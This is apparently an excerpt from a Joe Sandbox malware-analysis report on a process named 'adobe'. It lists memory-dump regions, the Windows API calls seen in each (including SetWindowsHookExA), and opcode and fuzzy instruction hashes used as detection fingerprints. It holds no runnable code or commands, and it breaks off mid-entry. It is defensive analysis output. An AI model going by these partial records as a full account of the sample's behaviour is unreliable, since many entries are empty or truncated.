                                    • Instruction Fuzzy Hash: B22135B1D00209DFCB14CF99C844BEEFBF8EB88320F24842AE459A7250C774A944CFA4
                                    APIs
                                    • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0695A343
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6950000_adobe.jbxd
                                    Similarity
                                    • API ID: HookWindows
                                    • String ID:
                                    • API String ID: 2559412058-0
                                    • Opcode ID: 2b71ffdf54d1494ab7de794af80e2e506e18ea4c51761dbae9bf6f431253685c
                                    • Instruction ID: f4f3c4f5922933f00f0fb6be0c2df8e0d3fd786e02d33008f07548e0200934b8
                                    • Opcode Fuzzy Hash: 2b71ffdf54d1494ab7de794af80e2e506e18ea4c51761dbae9bf6f431253685c
                                    • Instruction Fuzzy Hash: EB2124B1D002498FCB54DF9AC844BEEFBF9AB88320F24842AD459A7250C775A944CFA4
                                    APIs
                                    • GlobalMemoryStatusEx.KERNELBASE ref: 012AEE7F
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4115357874.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_12a0000_adobe.jbxd
                                    Similarity
                                    • API ID: GlobalMemoryStatus
                                    • String ID:
                                    • API String ID: 1890195054-0
                                    • Opcode ID: 35cfa4a4fa736e6411263446508683213318c738bb1414ab6d14ccbf3a8c9da0
                                    • Instruction ID: fa7bbec446b45eacd821df3a4d2ccb531e719db9049f1183951ba41e67c265d7
                                    • Opcode Fuzzy Hash: 35cfa4a4fa736e6411263446508683213318c738bb1414ab6d14ccbf3a8c9da0
                                    • Instruction Fuzzy Hash: A811F0B1C0066A9BCB10DF9AC544BDEFBF4AF48320F15816AD918A7250D378A944CFE5
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 06951E16
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6950000_adobe.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: f791def6ce417d34a5d3c28be5ea02056116816ede6cefe5f3b269621c962c56
                                    • Instruction ID: 13588b18573c8d585b92f463557a95e56eb598b68c29799cdadb4a91629215f9
                                    • Opcode Fuzzy Hash: f791def6ce417d34a5d3c28be5ea02056116816ede6cefe5f3b269621c962c56
                                    • Instruction Fuzzy Hash: DF1132B5C003488FCB10DF9AC444BDEFBF4EB48210F10842AD829B7A00C375A544CFA5
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 06951E16
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6950000_adobe.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: 4ec7fdd0759bc48e1abe66abffb1442c7d9b90a6100f9c797b58e7805c42cb10
                                    • Instruction ID: d4abce4f307c55f8bf6ef4b6c3e82606b8b50a2ec295a59679f0776e44c6e243
                                    • Opcode Fuzzy Hash: 4ec7fdd0759bc48e1abe66abffb1442c7d9b90a6100f9c797b58e7805c42cb10
                                    • Instruction Fuzzy Hash: 521102B5C003498FCB14DF9AD844BDEFBF8EB49220F11846AD869B7610C375A545CFA5
                                    APIs
                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06957C35), ref: 06957CBF
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6950000_adobe.jbxd
                                    Similarity
                                    • API ID: CallbackDispatcherUser
                                    • String ID:
                                    • API String ID: 2492992576-0
                                    • Opcode ID: 1e99370ca0331c96b5f4705d1c2dcb558d88a7f867c136eccd2ffbdd114902e1
                                    • Instruction ID: 86cdbb48a59baead9109080e617eca3a3f3db908894c2319e90c7fb12bb9da67
                                    • Opcode Fuzzy Hash: 1e99370ca0331c96b5f4705d1c2dcb558d88a7f867c136eccd2ffbdd114902e1
                                    • Instruction Fuzzy Hash: D91133B1800248CFCB10DF9AD484BDEBBF8EB48320F20841AD959A7700C374A944CFA4
                                    APIs
                                    • OleInitialize.OLE32(00000000), ref: 06958585
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6950000_adobe.jbxd
                                    Similarity
                                    • API ID: Initialize
                                    • String ID:
                                    • API String ID: 2538663250-0
                                    • Opcode ID: 46cf460726b974ece1fa0283b6881cb0159c96197a20f2b95c022e530d17442f
                                    • Instruction ID: 3b5991f8afe42c7b030fdfad8695ab9320173f71b53215d3fed12b550424a8d2
                                    • Opcode Fuzzy Hash: 46cf460726b974ece1fa0283b6881cb0159c96197a20f2b95c022e530d17442f
                                    • Instruction Fuzzy Hash: D81142B4D00358CFDB20DFAAD548BDEBFF4AB48324F24845AE419A7610C374A980CFA5
                                    APIs
                                    • OleInitialize.OLE32(00000000), ref: 06958585
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6950000_adobe.jbxd
                                    Similarity
                                    • API ID: Initialize
                                    • String ID:
                                    • API String ID: 2538663250-0
                                    • Opcode ID: c3108788db344037e99bd5f74b4f1aeddbd09b0297fabe4e89159ad8252182a0
                                    • Instruction ID: 04120b1da4f0d6e7a89eab681cebfa56212eaf6347053ff1981522758232859b
                                    • Opcode Fuzzy Hash: c3108788db344037e99bd5f74b4f1aeddbd09b0297fabe4e89159ad8252182a0
                                    • Instruction Fuzzy Hash: 161145B18003588FDB20DF9AD544BDEBBF4EB48320F20845AD519B7610C378A940CFA5
                                    APIs
                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06957C35), ref: 06957CBF
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6950000_adobe.jbxd
                                    Similarity
                                    • API ID: CallbackDispatcherUser
                                    • String ID:
                                    • API String ID: 2492992576-0
                                    • Opcode ID: 15c39eda28798b0ab79aa57bd5f3683f90c2c165de070193dd9942ece6b1fd6f
                                    • Instruction ID: 1b6abc4eb7b262ddd51aced22c95705c163617acc8582ef02a1a9cbb7251de22
                                    • Opcode Fuzzy Hash: 15c39eda28798b0ab79aa57bd5f3683f90c2c165de070193dd9942ece6b1fd6f
                                    • Instruction Fuzzy Hash: 271103B58002498FCB10DF9AD844BDEBBF8AB49324F20841AD559BB750C775A544CFA5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: XPpq
                                    • API String ID: 0-1266478781
                                    • Opcode ID: bc7848ab049a9601cfe1e750837b93b37fdce09abecb1c4a10d9e6009b56a7dd
                                    • Instruction ID: 71fafe22bdda4fdcddbe5d6e0bc278a71c430abaffe1e414834467ff369febf7
                                    • Opcode Fuzzy Hash: bc7848ab049a9601cfe1e750837b93b37fdce09abecb1c4a10d9e6009b56a7dd
                                    • Instruction Fuzzy Hash: 0F417F30F002089FDB54DFA5C854BAEBBF6EF88700F208529E506AB3A5DA749C45DF90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: PHkq
                                    • API String ID: 0-902561536
                                    • Opcode ID: 901de2f787e4773682277a8993e139016dc7de612aebe9909b5cea36a8800445
                                    • Instruction ID: 8201618a93cee5966b6a99968b5668298bb7ddfe9daeaf2a9b5321a069f2e525
                                    • Opcode Fuzzy Hash: 901de2f787e4773682277a8993e139016dc7de612aebe9909b5cea36a8800445
                                    • Instruction Fuzzy Hash: 3541AF30F003099FDB61DF66C58469EBBB6AF85340F204929E412EB644DB74D94ACB80
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: PHkq
                                    • API String ID: 0-902561536
                                    • Opcode ID: addeb751e3bec7a849a2359ffd3cb80f462d3dc22dd7726667b17e08a2cee6ed
                                    • Instruction ID: 694e4b2df9cfcb989cb757df7f0027a790fe1ac0d8975b23718dfb504202923f
                                    • Opcode Fuzzy Hash: addeb751e3bec7a849a2359ffd3cb80f462d3dc22dd7726667b17e08a2cee6ed
                                    • Instruction Fuzzy Hash: 0A31E330B002058FDF59AB75D95476F7BAAAF89200F208538E406DB399DF35DD46CBA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: |
                                    • API String ID: 0-2343686810
                                    • Opcode ID: d90ab82afbc34f56d030b85602a85e2ae7a0973a8cce2fb2d56c058282a5b1dc
                                    • Instruction ID: 209270d589639c7a2240c7a80b6b344774c69c2fbb9c42b94ac167ce76e001a0
                                    • Opcode Fuzzy Hash: d90ab82afbc34f56d030b85602a85e2ae7a0973a8cce2fb2d56c058282a5b1dc
                                    • Instruction Fuzzy Hash: 69115971B102149FDB54DF78D805B6EB7F6AF88740F10846AE94AD73A4EB35A900CB94
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: |
                                    • API String ID: 0-2343686810
                                    • Opcode ID: 6067a6f6c51de135fef5121a78bf88729993e0e86b5fa395821258a027ab1d03
                                    • Instruction ID: 854c66a60bcdcf7001d3023bf62bf645e1bc8019ae046bde8d0ba86a7edbaa9f
                                    • Opcode Fuzzy Hash: 6067a6f6c51de135fef5121a78bf88729993e0e86b5fa395821258a027ab1d03
                                    • Instruction Fuzzy Hash: 24114971B002149FDB44AF78D804B6EB7F6AF48700F10846AE50AE73A4DB359D00CB94
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 902a3766b11a38565e71bf079046e2ec1e6f19eb9505e61592a098067ec580e2
                                    • Instruction ID: 7b26d3a15a7d55554a558577ffa2cc16de5826bff27e6d4ee0c5770ea8d980fe
                                    • Opcode Fuzzy Hash: 902a3766b11a38565e71bf079046e2ec1e6f19eb9505e61592a098067ec580e2
                                    • Instruction Fuzzy Hash: C171D331F00205DFDF64ABB9E9643AEB7ABEB84310F20482AE50AD7754DB359C45C790
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bd618522068fc177e9af97c17c3dff7de69ceb7bbd007b5ebf08077d725b78f0
                                    • Instruction ID: 620acb9711407aed33d692fb18d77ff0641c8c60d8002a8e168168d9fa909530
                                    • Opcode Fuzzy Hash: bd618522068fc177e9af97c17c3dff7de69ceb7bbd007b5ebf08077d725b78f0
                                    • Instruction Fuzzy Hash: B061D3B2F002114FDF559A7EC88066EBAEBAFC4610B254439F80ADB379DE65DD0287C1
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0437bfa78ec2135dbac4b5abeecac3b39a6d51619d818d85afe19f659984a1c1
                                    • Instruction ID: be179c901e7f0b0388b8dcee8219073b90d80b1b7c1a1d2e887df0c9ce06318d
                                    • Opcode Fuzzy Hash: 0437bfa78ec2135dbac4b5abeecac3b39a6d51619d818d85afe19f659984a1c1
                                    • Instruction Fuzzy Hash: 5A813B30B006098FDF54DFA9D5547AEB7F6AF89700F208529E40ADB398EB74DC428B91
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 762d82c910055be89b9c36c1541537b69982042d7db9a9b9b6a7d4cc8e9a2e8c
                                    • Instruction ID: 9b7bab56362987d3b6726e3de1ea57f870a37c8d718ac32fe90c2ac6fb4ab114
                                    • Opcode Fuzzy Hash: 762d82c910055be89b9c36c1541537b69982042d7db9a9b9b6a7d4cc8e9a2e8c
                                    • Instruction Fuzzy Hash: E9914E30E106198FDF60DFA9C890B9DB7B1FF89300F208599E549AB255DB70AE85CF90
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2e38bf9ff7cf45d7c2b800032dc78742c91efd1769d50607bce83bbe6c314b9f
                                    • Instruction ID: c76892a32f918fc671913ea5a7b6cb53872fc5fdd0838c4033a3b938037b3e8d
                                    • Opcode Fuzzy Hash: 2e38bf9ff7cf45d7c2b800032dc78742c91efd1769d50607bce83bbe6c314b9f
                                    • Instruction Fuzzy Hash: 2A913C34E106198BDF60DFA9C890B9DB7B1FF89300F20C599E549AB255DB70AA85CF90
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f077f6b3ecc96647e357a969a83cc13fce18f92252c08c01e30bf7818bc8278e
                                    • Instruction ID: 1217f7960dbcf2017ad9c2592fbe3727e1cc5745e648f9a32c5db4325594172a
                                    • Opcode Fuzzy Hash: f077f6b3ecc96647e357a969a83cc13fce18f92252c08c01e30bf7818bc8278e
                                    • Instruction Fuzzy Hash: 81712971A002099FDB54DFA9D980AAEBBF6FF88300F258529E405EB755DB30ED46CB50
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a7e0122bde5f1696dede15688247f5a0f5319b570bfb4a8dac5c51f70fc65632
                                    • Instruction ID: 01e1d7e87c01df5db108811d8bf92acffb29cb723d1e7b6db634eed44a7468f8
                                    • Opcode Fuzzy Hash: a7e0122bde5f1696dede15688247f5a0f5319b570bfb4a8dac5c51f70fc65632
                                    • Instruction Fuzzy Hash: 33713971A002099FDB54DFA9D980AAEBBF6FF88300F258429E405EB755DB30ED46CB50
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 814452efc34e4d64c09dce42180b64737aea62f311961659a96b8b261647c731
                                    • Instruction ID: d0577b790e41e4476cdaee79dff84f77e3ab55440678ec4b9e067c5daa666b20
                                    • Opcode Fuzzy Hash: 814452efc34e4d64c09dce42180b64737aea62f311961659a96b8b261647c731
                                    • Instruction Fuzzy Hash: DE51B530B103049FEFA4AB6DE95472F265FD789350F30482AF10AD3BA9DA39CC854391
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d7ce43b0499bbe56fd00261379e5168b568aa48549ad6fb735674d4dd32ba5c0
                                    • Instruction ID: 1a177338b86f819ce0a490dd97568fb12fdbf6d69faa773a6078b595b62a036a
                                    • Opcode Fuzzy Hash: d7ce43b0499bbe56fd00261379e5168b568aa48549ad6fb735674d4dd32ba5c0
                                    • Instruction Fuzzy Hash: C951B630B103149FEFA46A6DE95472F365FD789350F30482AF10AD37A8DA39CC8543A2
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5bfe7f9feb4d688ad2202ba1bf114d9cf9d9bcd27cbbd5eee9a4c95b89da58ba
                                    • Instruction ID: 5e726d080ca089adb47612f53f9d23b9363e8f0591720fb67436acba097b162a
                                    • Opcode Fuzzy Hash: 5bfe7f9feb4d688ad2202ba1bf114d9cf9d9bcd27cbbd5eee9a4c95b89da58ba
                                    • Instruction Fuzzy Hash: 16415E71E007058FDB70CFAAD880AAFFBB6FB84310F21492AE156D7A50D770E9558B91
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: db9a841cb590cecd12fe180001adffedef8446f35b6fbba6b95b173a03ac91f4
                                    • Instruction ID: 657f0e1ee2330318debb9db6d4bb8a48022956e1557bf4ffdb4570d87d5ce9ac
                                    • Opcode Fuzzy Hash: db9a841cb590cecd12fe180001adffedef8446f35b6fbba6b95b173a03ac91f4
                                    • Instruction Fuzzy Hash: 06319C30E102059FCB19CFA5D9946AEB7B2EF89300F208929E906E7750DB71ED46CB50
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 688f65b5cf5ff759ceed75b7f1be57599eb171e3d773ff65fcdca625646e5183
                                    • Instruction ID: f76d7d891c6ab14fffe1f4a2ffe0f87aa4f652aadb78e019152f0864bd76ece8
                                    • Opcode Fuzzy Hash: 688f65b5cf5ff759ceed75b7f1be57599eb171e3d773ff65fcdca625646e5183
                                    • Instruction Fuzzy Hash: 4731AC30E102059BCB19CF65D89469EB7B6EF89300F20C929E906E7750DB31ED42CB50
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d78579bfb685ec1597b80826c10c311323f9976e97b9930469967f705d87ce85
                                    • Instruction ID: aa8b6d089b1f2a820473ec2be35480eb45eb82d56f6a31eea9ec784c9796a5c7
                                    • Opcode Fuzzy Hash: d78579bfb685ec1597b80826c10c311323f9976e97b9930469967f705d87ce85
                                    • Instruction Fuzzy Hash: DC213975F016169FDB50DFAAD980BAEBBF5FB48610F10942AE905E7354E730DC408B90
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: da84f217eb4c4067ddd1d598a0d1dec2b055f416b06836bb0e0f2fd605264ad9
                                    • Instruction ID: 22b2df4d46bc8eac75106f3763a676fb81df8a85f137edfdd457db25e8889617
                                    • Opcode Fuzzy Hash: da84f217eb4c4067ddd1d598a0d1dec2b055f416b06836bb0e0f2fd605264ad9
                                    • Instruction Fuzzy Hash: 20215775E006059FDB40DFA9E940BAEBBF5EF48210F10942AE946E7354E730DC408B90
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4112977587.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_f5d000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f3d02d6af4a4c5072a8c40ddccb98fb19fc17e91fbe600df131b2fa096a10162
                                    • Instruction ID: dbf1b7cc0a03af087e5f47faaa54644e7b32093f3d0aede9990807dc13987b16
                                    • Opcode Fuzzy Hash: f3d02d6af4a4c5072a8c40ddccb98fb19fc17e91fbe600df131b2fa096a10162
                                    • Instruction Fuzzy Hash: F3215E7150E3C09FC713CB24D994711BF71AB46214F29C5DBD9858F2A7C23A980ADB62
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4112977587.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_f5d000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 65823b03e118ff0cb55ffa77abbc76d6cc6ab9d27e6e7997a7c1c0f54d9aedeb
                                    • Instruction ID: 75ef083952cdbf809fbb6010f78d50d0ad5f97e55a4cb88e93c81aa527711d70
                                    • Opcode Fuzzy Hash: 65823b03e118ff0cb55ffa77abbc76d6cc6ab9d27e6e7997a7c1c0f54d9aedeb
                                    • Instruction Fuzzy Hash: AF210471505204DFDB24DF14D9C0B26BBA5FB84325F24C56DDE0A4B39AC33AD84BDA62
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f105dc90df1ac9a1d1b271c6b1ae60c08403c215f56b89f03670528f0dd8cc20
                                    • Instruction ID: 61727b2ec329b85b82602d31a6ffc7e789c7c6fb6833030b5ccba54eebca0cc7
                                    • Opcode Fuzzy Hash: f105dc90df1ac9a1d1b271c6b1ae60c08403c215f56b89f03670528f0dd8cc20
                                    • Instruction Fuzzy Hash: 5421A230B102199FDF54DB6AE95079DB7FAEB84350F20842AF405EB754DB34EC418B81
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 47c7c72d0c12f2996aa49dc3722969123e7a47d3a6cece713cd2d8073c578ba0
                                    • Instruction ID: 776ea47d7d0aa2a8ebc13f421eeea77a81772cf25709dc8c0163d9246c833223
                                    • Opcode Fuzzy Hash: 47c7c72d0c12f2996aa49dc3722969123e7a47d3a6cece713cd2d8073c578ba0
                                    • Instruction Fuzzy Hash: 7311D2347006104FDB659AAED85471AB7EADF89B50F30C83AF54AC7754EA26DC034391
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 99f3567967b6354615a7b5ab43f891144463a1cd2f16f4b9e0fdb6be05c1ffc1
                                    • Instruction ID: b0b46d5077f0b6f8e38b2e83016fc3c36a25fd70035393baaf11373e7cc99df1
                                    • Opcode Fuzzy Hash: 99f3567967b6354615a7b5ab43f891144463a1cd2f16f4b9e0fdb6be05c1ffc1
                                    • Instruction Fuzzy Hash: 9C11A135B005244FDF549A79D8186AF73FAEBC8650F104539E40AE7398EE65DC018BE0
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2cc7027e950cb5108825d444d1a550f7b32c82d0d71c80bfa171bd39329eeaf7
                                    • Instruction ID: 746f5d0f879f65551c84a76a22e9a4159da2c4797c8b8dbd8075a43164982a39
                                    • Opcode Fuzzy Hash: 2cc7027e950cb5108825d444d1a550f7b32c82d0d71c80bfa171bd39329eeaf7
                                    • Instruction Fuzzy Hash: EF01B571B142004FDB659A7DE85172A77EBDBC6760F21882AF109C7345DA25DC068391
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9e1b4f48aec753ad082da792235eb560433057b75c235a1ff678173f511d0a29
                                    • Instruction ID: 655400d41069087059aef1ffbf756ae9902359a685f4b11b57cd89d3a11637c0
                                    • Opcode Fuzzy Hash: 9e1b4f48aec753ad082da792235eb560433057b75c235a1ff678173f511d0a29
                                    • Instruction Fuzzy Hash: 2F21C4B5D01219AFCB10DF9AD985ADEFBB8FB48310F10812AE918A7340D374A954CFE5
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7bb1611dacaee7ec176a32c6733215d0d665b7af39b9496e33bd28689e82f041
                                    • Instruction ID: a9942421eabacf91162b78e022c6b0c47fdd0e7508b8b205c398b3d404bc49fe
                                    • Opcode Fuzzy Hash: 7bb1611dacaee7ec176a32c6733215d0d665b7af39b9496e33bd28689e82f041
                                    • Instruction Fuzzy Hash: 5301B136F005155FDF649A69DC18AABB7FEEB88610F000439E507E3344EE249C018BE1
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a53e36caa4953813d41e38859d86ab0137cb3fa4e62352159294ff674031525c
